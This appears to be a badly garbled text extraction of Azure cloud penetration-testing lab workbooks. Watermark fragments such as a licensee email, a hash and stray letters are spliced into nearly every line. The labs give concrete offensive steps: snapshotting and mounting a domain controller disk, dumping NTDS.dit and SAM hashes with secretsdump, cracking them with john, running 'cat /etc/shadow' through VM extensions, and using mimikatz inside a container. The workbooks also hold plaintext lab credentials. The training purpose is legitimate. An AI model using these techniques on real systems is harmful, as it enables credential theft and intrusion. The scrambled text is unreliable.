Understanding the limitations of our tools
>
om
While we have been using az exclusively, not all functions are exposed to az directly. Let's begin by open up firefox
_c
found on the desktop.
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
https://portal.azure.com
:
To
From here you will be asked to sign in. You can use the account. At the top of the search bar, you
d
summer@sec588.com
se
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
Conclusion
23169600 @
ou
tlo
66
This lab is the beginning coursory tour of the az tool, the tool itself can be weilded for both positive system
administration but also for our own use in a penetration test if we understand how to navigate the system. Just like with
s1
aws tool, the az tool is working at the control plane layer and could circumvent some of the traditional controls we
ne
Gregg Harris
au
Over the next few labs, we will be using this tool to implement our actions, getting familiar with how to use the tool for
Ha
Additional Resources
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
live
20
While we have seen the ways that Azure and Amazon interact with API's using their CLI tools, we can also
interact with many of these environments with the native SDK's. This lab will introduce us to using the Azure API
20
in Postman and by doing so we will:
,
28
pauljones166@outlook_com
ly
1. Learn how the OAuth Flow in Azure works, so that we can later leverage it to nd a higher priviledged
Ju
account.
>
2. See how Device Flow will lead us to using a bearer token. We can later use this type of access for items like
om
Microsoft Graph.
_c
3. Learn how to use postman to import a collection.
ok
Requirements for This Lab 23169600 @
ou
tlo
66
Gregg Harris
au
Try It Yourself
rri
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
1. Use the az login tool to login via a webbrowser and through the cli.
:
To
2. Create a clientSecret using the Postman-APP that is located in the Azure AD App Environment. You can use
the account to create a valid authentication.
d
jerry
se
5. See what level of Authentication the API has with the API.
Li
Walkthrough
live
Let's open the MATE terminal so that we can launch Postman
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
$ az login
Ha
gg
Once you login, you will not be returned back to the terminal you need to manually click on it to see the
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
successful login:
:G
To
d
nse
ce
Li
live
Username: jerry@sec588.com
3e1e3b497543e6c11ac8e4188959c93e
Password: HumanMusic2019
From this point we will use the Firefox application to navigate the Azure Portal.
20
20
Log into: http://portal.azure.com .
,
28
pauljones166@outlook_com
ly
Using the Azure Portal search options type the following:
Ju
>
om
Azure Active Directory
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600
Click on the application. Record the following options:
@
ou
tlo
66
Gregg Harris
au
From here we will now need to create a client secret to be able to connect our postman into our system.
<p
s
rri
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
With these values we can now con gure
23169600
Postman .
@
ou
tlo
66
[http://bit.ly/2TPlWRO]
ljo
Gregg Harris
au
<p
The URL above has a lowercase L and the letter O NOT the number Zero.
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
From here RIGHT CLICK 23169600
Download the JSON ou
tlo
and choose Save Link As...
@
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
live
Let's open the MATE terminal so that we can launch Postman
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
<p
$ cd /opt/postman
s
rri
$ ./Postman
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
To log into Azure we will need to perform an OAuth Device Flow Authentication. This will be a two step operation.
s1
In the rst step we will use OAuth device ow to get a Device Flow Authentication token which will be our
ne
Gregg Harris
au
Click on the left hand side under the Azure REST Folder: Get AAD Token .
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
n se
ce
Li
live
Click on the Body button (or tab depending on how you view this). At this point we should be able to see the
Body of the requests. The Body shows us that we need several Environment Variables:
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
Under Environment Click Add on the Right. We can now add an Environment. Let's call it: Azure .
ne
ljo
Add the following Environment Variables and ll in the CURRENT Values eld:
Gregg Harris
au
<p
clientSecret
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
subscriptionId
d
se
resource This needs to be set to: https://management.azure.com as we will be testing access to this
resource.
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
Note the capitalization. The rst word is all lowercase and the second word begins with an uppercase letter. Make
au
sure that none of the variables have spaces BEFORE or AFTER the word.
<p
s
rri
Ha
Select Add and then click the X at the top corner to close out the Environments screen completely.
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G:
Once you click send you will see a response with an access_token .
To
d
nse
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
Copy this value, and click the Eyeball to enter it in as the bearerToken .
ok
subscriptionId:
23169600 @
ou
tlo
Now we will need to get a subscriptionId. To get this open a terminal and type the following commands to get the
66
s1
Gregg Harris
au
<p
bearerToken This is the access_token value, becuase it has a dot (.) you cannot just doubleclick the value to
s
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Armed with these values we can now formulate a new API response. Underneath the the request for Get AAD
:
Token you should see a Get Resource Groups request. Choose it.
To
d
se
Once it is open click Headers . You will now see some unresolved variables. Let's input these.
n
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
{
"error": {
"code": "AuthorizationFailed"
}
}
20
, 20
28
pauljones166@outlook_com
ly
Ju
Please note, this is not Authentication failed, this is Authorization failed, which means authentication
passed, but you are not scoped to access this resource. The resource is an Azure AD Resource. Later today we
>
om
will be using these keys to access O ce Resources.
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
Conclusion
gg
While this lab did not yield exploitation it builds on the fact that today we will be using the Postman tool in a new
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
and di erent way. In order to successfully use the tool we need to understand how to build programmatic access
:
to Azure, and this lab demonstrates how to successfully do this by using the Device Token Flow of SAML to
To
authenticate.
d
se
n
Additional Resources
ce
Li
live
SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
Using the capabilities of the system, we may be able to leverage the ability of Azure to Backup and Restore disks
20
to abuse this process and obtain additional information about local resources. This lab demonstrates how to use
20
the system to gain access to hashes in the SAM Database and the NTDS.DIT for a Domain Controller.
,
28
pauljones166@outlook_com
ly
Requirements for This Lab
Ju
>
om
This lab requires a few items:
_c
ok
The az tool
Try It Yourself
ne
ljo
Gregg Harris
au
dc1-disk1 student-X
rri
4. Use the secretsdump.py tool that ships with impacket to extract the local administrator hash.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Walkthrough
:
To
d
se
Making Snapshots
n
ce
Let's open the MATE terminal so that we can launch Azure Storage Explorer.
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
$ cd /opt/StorageExplorer
Ha
gg
The Storage Explorer tool is an Electron Based tool so it may take a few minutes to launch.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
Please note Storage Explorer is not the most stable of applications and may require you to run the command
To
more than once. If you receive a .NET 2.2 error, run the application again.
d
n se
ce
$ ./StorageExplorer
Li
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
The Azure Storage Explorer is a menu-driven system where you can view storage blobs and storage
_c
environments. You can look through the system and see what you have available to you.
ok
23169600
Once you've explored a bit, let's navigate the following location:
@
ou
tlo
66
Here you, there are a few disks, locate the one called dc1-disk1, click the button at the top that says 'Create
ljo
Gregg Harris
au
<p
dc1-disk1-student-X
s
rri
Ha
Wait until the job is 'done,' this may take a few minutes.
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
Note during a real engagement we may wish to hide our activities and given the number of Windows vs. Linux
systems deployed we may choose to hide amongst the masses by using whatever is more common.
20
20
The rst item is we need to get the Snapshot ID of our snapshot:
,
28
pauljones166@outlook_com
snapId=$(az snapshot show --name dc1-disk1-student-X --resource-group <class-subdomain>-
ly
Ju
resources --query [id] -o tsv)
>
om
To check if this command worked use:
_c
ok
echo $snapId
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
<p
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
With the disk available, we can now create a VM, given enough permissions, we can create a VM and mount the
:
To
disk. What about if this is just a backup/restore account? It probably would have this capability.
d
se
You may need to log in as Jerry if you have yet not done this or your session has expired:
3e1e3b497543e6c11ac8e4188959c93e
Once this the Virtual Machine is created you you can do the following:
A set of keys are created for you if they are already not on the system.
20
20
~/.ssh/id_rsa and ~/.ssh/id_rsa.pub
,
28
pauljones166@outlook_com
A Public IP Address for your VM is provided to you in the JSON array
ly
Ju
>
You should now be able to login to the system by typing the following:
om
_c
$ ssh StudentX@<publicIpAddress>
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
SecretsDump.py
s
rri
Once we have a valid login to our VM, let's perform the following tasks:
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
$ dmesg | grep sd
Li
sda and
live
What this prints out is all of the SD (SCSI Drives) that are available, by default there are two that ship with this
VM: sdb . These are already mounted. Are there any other? The rst available disk may be sdc
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600
At this mount, we can as root create a mount directory and mount the SECOND
tlo
sdc
second? In modern windows for EFI purposes, the second partition is more than likely the
ou
@ partition. Why the
C:\ drive.
66
To verify the contents of any disk in the future, perform an fdisk -l /dev/sdX substituting X for the letter of
s1
the disk.
ne
ljo
Gregg Harris
au
The errors about the machine not able to mount the disk as the disks are not cleanly unmounted, can be safely
gg
ignored.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
$ ls /mnt/disk1/
3e1e3b497543e6c11ac8e4188959c93e
Impacket requires the pip binary needs to be present on our system, which ships with the python-pip
package.
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
$ sudo apt-get update -y && sudo apt install python-pip -y
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
This clones the impacket repository that contains secretsdump.py . We can now use pip to install impacket as
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
a library for us to use the script.
G
secretsdump.py
:
To
$ cd impacket
ce
Li
live
The pip install takes a few minutes to build. Once done you will then be able to drop into the examples directory:
3e1e3b497543e6c11ac8e4188959c93e
~/impacket$ cd examples
~/impacket/example$
20
20
Extracting the Hashes
,
28
pauljones166@outlook_com
Here is the command that we can use to dump secrets:
ly
Ju
>
~/impacket/example$ python secretsdump.py -system /mnt/disk1/Windows/System32/config/SYSTEM -
om
ntds /mnt/disk1/Windows/NTDS/ntds.dit -outputfile /tmp/hashes -hashes LMHASH:NTHASH LOCAL
_c
ok
What do these switches do?
-system
23169600
The location of the SYSTEM HIVE
@
ou
tlo
66
-ntds
ne
ljo
Gregg Harris
au
<p
-outputfile /tmp/hashes
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
We at least now have the Administrator hashes to the VM, which may be used in other places or to get us further
into the environment.
Once you have hashes, you may wish to crack them with a password cracking tool. The password cracking tool
used is john .
3e1e3b497543e6c11ac8e4188959c93e
Copy the contents of /tmp/hashes.ntds to your local system. Even a clipboard copy is ss cient. The example
below has you copying it to a le called /tmp/hashes on YOUR local system.
20
20
When complete run the following commands:
,
28
pauljones166@outlook_com
/opt/johntheripper/john --format=NT --wordlist=/home/sec588/files/wordlists/rockyou.txt
ly
/tmp/hashes
Ju
>
om
You should now have a list of passwords used in these password dumps.
_c
ok
Conclusion
23169600 ou
tlo
This lab provided you a way to look at how Storage and Backup operations can be abused to gain unauthorized
access to a system. We performed an attack to show how to obtain the hashes themselves. Using the hashes and
@
using them to move around a network is a discussion for the SEC560 class environments. For now, this is a good
66
Gregg Harris
au
<p
This lab is important as quite often, systems administrators build a backup/restore capability somewhere in the
s
system without thinking through the implications of such permissions. Does this account have the capability to
rri
snapshot a disk? Possibly. Does the account have the ability to verify and test the authenticity of the disk? Maybe.
Ha
To expedite our labs, we did everything from within the cloud, but this does not mean that backing up a VHD and
gg
downloading wouldn't also be possible. Keep this in mind when working on Azure Environments.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Additional Resources
:
To
d
se
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
While Microsoft Azure does provide 'Serverless' Functions, the type of functions that they support are starkly
ly
di erent than the Amazon Lambda Functions. While Amazon Lambda functions are container restricted
Ju
functions that do not easily see other functions, the Microsoft Serverless functions are very di erent. The
>
system uses an open source framework known as Project Kudu. The project is found on
om
[https://github.com/projectkudu/kudu]. We are going to explore how Azure Functions work with each other and
_c
the di erences in the system.
ok
Requirements for This Lab 23169600 @
ou
tlo
66
Try It Yourself
ljo
Gregg Harris
au
<p
Find the Azure Functions Area, and nd the resource group called: shared-resource-group . The function
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
name is called shared-resource-function-app
:G
To
You will notice that Functions is now using the new style of Functions but we can switch this back to "classic
d
se
experience"
n
ce
Li
live
2. In Which Directory within D:\home is used to store secrets if any are listed? ?
3e1e3b497543e6c11ac8e4188959c93e
3. Inside of which function in the Manage Area contain Secrets from the Vault? ?
BONUS: There is a vulnerability in several of the functions, what are the vulnerabilities? ?
20
20
Challenge Area Walkthrough
,
28
pauljones166@outlook_com
ly
Ju
Let's take a look at the dev site open up Firefox and navigate to [http://portal.azure.com].
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
We will log in with the jerry@sec588.com account in which his password is HumanMusic2019 .
:
To
d
Function
n
ce
From here you will click on the shared-resource-function-app. This application has several 'Functions'. Click on
Li
the HttpTrigger3 .
live
This particular Function is part of a larger 'application'. In the Lambda world this particular Application would
have isolated trigger functions. Let's explore how this is vastly di erent in Azure.
3e1e3b497543e6c11ac8e4188959c93e
Let's explore what would happen if someone had command execution to this Application.
20
set
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
Notice that there are
ok
many environment variables on here. Let's see what other directories we can nd.
D:\home\site\wwwroot\HttpTrigger3
s1
ne
ljo
Type cd ..
Gregg Harris
au
<p
If you type dir you will see all of the les in the repository.
s
rri
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Your job is to answer the following questions ONLY using the console in the GUI to simulate an attacker with
:
To
1. Which one of these functions has a Username and Password in the PlainText les?
live
2. In Which Directory within D:\home is used to store secrets if any are listed?
3. Inside of which function in the Manage Area contain Secrets from the Vault, this one can be done in the GUI.
BONUS: There is a vulnerability in several of the functions, what are the vulnerabilities?
Answers
1. If you use type the following le: D:\home\site\wwwroot\HttpTrigger1\index.js You will see a
3e1e3b497543e6c11ac8e4188959c93e
username and password at the top of the le.
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
:
To
d
nse
ce
Li
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
4. There are 2 vulnerabilities:
ok
23169600
SQL Injection in HttpTrigger1, speci cally in this eld:
@
ou
tlo
var query="select amount,date from purchases
p " + "inner join cards c " + "on p.card_id = c.card_id " + where c.cardNumber '" = cardNum
66
"'";
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
In the NodeJS HttpTrigger3 there is on body statement that will cause Server Side Javascript
gg
eval()
Injection (SSJI).
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G:
To
d
n se
ce
Li
Conclusion
live
This lab illustrates that once a serverless function in a singular application is compromised the entire application
will act like a monolithic applicaion in terms of security. There is barely any access and authorization control
between functions on the disk and this is very di erent than other serverless functions that exist. This means
3e1e3b497543e6c11ac8e4188959c93e
Additional Resources
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
ce
Li
live
20
Brief Intro
,20
28
pauljones166@outlook_com
While running through an engagement or penetration testing, you may nd yourself wishing to run commands
ly
on a remote system. This course doesn't focus on the commands to run themselves, like a SEC560 or SEC660
Ju
course. While some courses may be looking at having you execute movement laterally between systems on the
>
same WAN or LAN environment, this course focuses on alternative methods to run commands on several
om
remotely available cloud system.
_c
ok
The techniques that we will focus on that are speci c to Microsoft Azure are:
There are also methods to do this with almost any cloud provider, as this is base functionality.
ne
ljo
Gregg Harris
au
Internet access and Access to our Azure Portal is required for this lab. The Virtual Machine from Lab 3.3 needs
rri
Ha
to be still available.
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
On Demand students should ensure they have this virtual Machine available, if not, they should recreate it.
G:
To
Try It Yourself
d
n se
ce
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 ou
@
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
$ az account show
n
ce
Li
live
Let's validate that we can run the azure commands to list out virtual machines:
$ az vm list -o table
1. The DC
3e1e3b497543e6c11ac8e4188959c93e
2. An IIS Server
3. A Dockerhost
4. One or more Student VM's
20
Let us explore the run-command option that is presented to us.
,20
If we execute the command below, we will see options that can be arguments to the command. Some of these
28
pauljones166@outlook_com
are far more attractive to us than other arguments.
ly
Ju
>
$ az vm run-command
om
_c
How does run command work? The az vm run-command has a list of commands that can be run, there is a
ok
limited set of options.
23169600
RunPowerShellScript : Runs a powershell script
@
ou
tlo
66
Gregg Harris
au
<p
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Given that we have the right to make speci c changes, we have the potential to apply the extension labeled
Li
RunPowerShellScripts
bevy of scripts that we can run. live
which would provide us a mechanism to execute PowerShell remotely. There is a
One option? How about if we run powercat.ps1 ? Maybe we can use PowerShell empire? Some of these
options may trip host-based EDR. If you interested in either tool navigate to:
What's another option? How about if we run some simple commands to prove the power of the system.
3e1e3b497543e6c11ac8e4188959c93e
1. List the current directory
2. Add a StudentX user
20
Let's see the syntax of the command:
, 20
28
pauljones166@outlook_com
az vm run-command invoke --command-id RunPowerShellScript --name dc1 -g <class-subdomain>-
ly
resources --script '$scriptDir = Get-Location; Write-Host "Current Dir is $scriptDir"'
Ju
>
This command does the following:
om
_c
--name dc1 : Run it on dc1
ok
23169600
-g <class-subdomain>-resources : Our Class Resource group
@
ou
tlo
66
Gregg Harris
au
Executing this command takes a few minutes, the output is returned in JSON:
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
se
C:\\Packages\\Plugins\\Microsoft.CPlat.Core.RunCommandWindows\\1.1.3\\Downloads
ce
Li
live
Are we running these commands in an elevated way? Remember you want to change your studentX account to
your student number.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
Using the Azure Portal to use the Custom Script Extensions
28
pauljones166@outlook_com
ly
Custom script extensions can are from the command prompt, but the experience is very cumbersome. You have
Ju
to create a speci c <xml> le that has a particular format.
>
om
_c
Note in the latest Azure portal this has slightly changed, so the Windows CLI is a bit simpler
ok
Let's try and use the Jerry 23169600 ou
tlo
account to perform these actions through the Azure portal.
@
66
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
:
To
d
n se
ce
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
Once you get to the Virtual Machine area, look at the di erent machines. Let's explore dc1 by clicking
_c
it. In the settings area choose Extensions .
ok
23169600
There is an existing script extension called
tlo
create-active-directory-forest . This particular scrpt will
ou
setup Active Directory, it uses the PowerShell custom module. You can click on it and see the results but you
@
cannot actually add another PowerShell extension. Only one module can be attached to a machine. You could
66
uninstall the module, but we may break our lab, so let's not do this.
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
Navigate back to the computers list. From here, choose your computer, the one you called studentX-Hack .
ce
This computer was created in Lab 3.3 Once you have this computer clicked choose extensions.
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
The next thing is to click
23169600 @
ou
tlo
Add . But what will we add? Since this is a Linux computer instance, we cannot run
66
PowerShell, but we can run bash. If the run-command runs as an elevated user in Windows, does this script run
s1
as root?
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Let's choose Custom Script for Linux . Let's click Create . The new Azure Portal has a new mechanism
Li
to create a Linux Script or any customer Script. This system uses the Azure File Storage Blob. Click Browse .
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
We navigate to our Storage Container for this lab. The storage account name is:
ok
sec588sharedstorageacct 23169600 ou
@
tlo
66
Inside it contains a folder called scripts. Click that into that folder.
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
!Student-X (pics/lab3.5/lab3-5-vm-extensions-storage-directory.png)
ce
Li
Make sure you click the checkbox and click the word
live select .
3e1e3b497543e6c11ac8e4188959c93e
cat /etc/shadow
20
Clicking the CustomScript button once done, you should see the output of the command.
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
Gregg Harris
au
<p
/opt/StorageExplorer/StorageExplorer
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Once it is loaded, you can navigate to the folder with these scripts:
:
To
d
sec588sharedstorageacct
n se
ce
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
Conclusion
>
om
In this lab we have shown you how to execute several commands in Azure, the commands we executed did not
_c
seem to be very special. Over the next few days we will go through which methods of execution prove most
ok
bene cial. However at the momment the critical pieces where, in what context can we execute commands. Will
23169600 tlo
those commands execute as an elevated user, which potentially could be a backdoor in the future?
@
ou
Why this lab is important
66
s1
ne
We may nd that we have existing running resources in Azure that we cannot access or turn o . The Azure VM is
running and rebooting it or snapshotting it may not yeild us options. How can we execute commands? We have
ljo
Gregg Harris
shown you two ways to execute backdoors with a live running system. These backdoors could be Download a
au
execute a backdoor through powershell or something else. We will provide you additional examples in upcoming
<p
sections.
s
rri
Ha
Additional Resources
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
SANS SEC560: Network Penetration Testing and Ethical Hacking (https://www.sans.org/sec560)
:G
To
d
se
n
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
One of the newest technologies that you will encounter in the cloud are containers. Windows Containers are very
ly
di erent from Linux containers. While some of the container technology was purposed built for hosting, the
Ju
Windows Kernel is still being expanded to support containers better. The typical throught process for securing a
>
container is not to run antivirus on the container host within the container but to run it while its stored in a
om
Container Registry or before it gets pushed into a host. This means if we can get a machine to execute one of
_c
our containers we may nd that the container can your any number of items in your environment that may be
ok
unexpected.
23169600
Requirements for This Lab
@
ou
tlo
66
s1
Gregg Harris
au
<p
Try It Yourself
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
1. List out container registry items.
G
use .log?
n
C:\\var
Li
Walkthrough live
Let's open the MATE terminal so that we can launch the Azure CLI
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
Now there are a couple of caveats that Microsoft has outlined in this:
<p
s
rri
Restrictions
Ha
gg
Azure Container Instances currently supports launching a single process with az container exec, and you cannot
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
pass command arguments. For example, you cannot chain commands like in sh -c "echo FOO && echo BAR", or
G
live
This means that we can run powershell.exe or cmd.exe but we cannot run: "cmd.exe /c dir".
3e1e3b497543e6c11ac8e4188959c93e
Let's open the MATE terminal so that we can launch az:
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 ou
@
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
$ az account show
d
n se
live
If we want to use a private Azure Container Registry we can, rst we need the name of the container registry:
You can use the username jerry@sec588.com by now you should have the password.
3e1e3b497543e6c11ac8e4188959c93e
To list the containers in the registry:
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
We are not going to use the internal container registry, but why? The internal container registry will require a
ok
large number of items to have checked o :
23169600 ou
tlo
Azure KeyVault, Azure SAS Tokens, and other authentication information to get the Container Infrastructure to
@
Our image isn't all that special, so let's do something else, let's pull the same container from the o cial public
ljo
dockerhub registry:
Gregg Harris
au
<p
This command may take more than 5 minutes to run. Because Windows Containers are Massive!
gg
re
What is in microburst_dev? Let's discuss what we have done in this container, this container was built using a
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
live
3e1e3b497543e6c11ac8e4188959c93e
RUN mkdir C:\tools
RUN net user jerry redacted /add
COPY mimikatz C:/tools/
COPY microburst C:/tools/
RUN powershell -noP -sta "Invoke-WebRequest -Uri
20
https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec
20
-Wait -ArgumentList '/I AzureCLI.msi /quiet'"
RUN powershell.exe -noP -sta "Invoke-PackageProvider -Name NuGet -MinimumVersion
,
28
pauljones166@outlook_com
2.8.5.201 -Force"
RUN powershell.exe -noP -sta "Install-Module -Name AzureRM -Scope CurrentUser -
ly
confirm"
Ju
RUN powershell -Command Add-WindowsFeature Web-Server; Invoke-WebRequest -
>
UseBasicParsing -Uri
om
"https://dotnetbinaries.blob.core.windows.net/servicemonitor/2.0.1.6/ServiceMonitor.exe"
_c
-OutFile "C:\ServiceMonitor.exe"
EXPOSE 80
ok
ENTRYPOINT ["C:\\ServiceMonitor.exe", "w3svc"]
23169600 @
ou
tlo
66
What does this container do? This container was an experiment by the author, could you push into a live
s1
container environment obviously malware and payloads. The answer is yes, but there are many caveats:
ne
ljo
1. The command execution environment wraps in a very strange way which will not yield for a perfectly runnign
Gregg Harris
au
shell
<p
2. There are issues executing certain commands from outside of items like powershell.
s
rri
Ha
What the author recommends is to copy a backdoor binary like a metasploit payload to connect back to you.
Once the container is in place let's execute a few jobs:
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
shared-resource-group
To
d
se
This container will now execute and attach a shell to you, a powershell runtime binary.
n
ce
You can look around the system that is running kubernetes for example you can:
3e1e3b497543e6c11ac8e4188959c93e
Some of the oddities of this shell? Meterpreter is caught when run in .exe, not caught when run in a di erent
language like powershell. Mimikatz is also not prevented, oddly enough.
20
If you have extra time
, 20
You can attempt to run mimikatz to dumb out the contents of the shell like so:
28
pauljones166@outlook_com
ly
Ju
C:\ PS> cd tools\
>
om
This will BREAK in your shell you will not see more than 2 or 3 lines
_c
ok
C:\ PS> .\mimikatz.exe
mimikatz # log
ne
ljo
Gregg Harris
au
<p
mimikatz # privilege::debug
s
rri
Ha
mimikatz # lsadump::sam
gg
mimikatz # exit
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
Please note you will now get th efollowing error: ERROR kull_m_registry_OpenAndQueryWithAlloc ;
d
kull_m_registry_RegOpenKeyEx KO
se
errors are new the Azure Container environment and could indicate further hardening from Microsoft to prevent
Li
This lab is the beginning coursory tour of the az tool, the tool itself can be weilded for both positive system
administration butalso for our own use in a penetration test if we understand how to navigate the system. Just
3e1e3b497543e6c11ac8e4188959c93e
like with aws tool, the az tool is working at the control plane layer and could circumvent some of the
traditional controls we may have put into a system.
20
Why this lab is important
, 20
28
Over the next few labs, we will be using this tool to implement our actions, getting familiar with how to use the
pauljones166@outlook_com
tool for reconnaissance gathering, listing of permissions and more will be critical.
ly
Ju
>
Additional Resources
om
_c
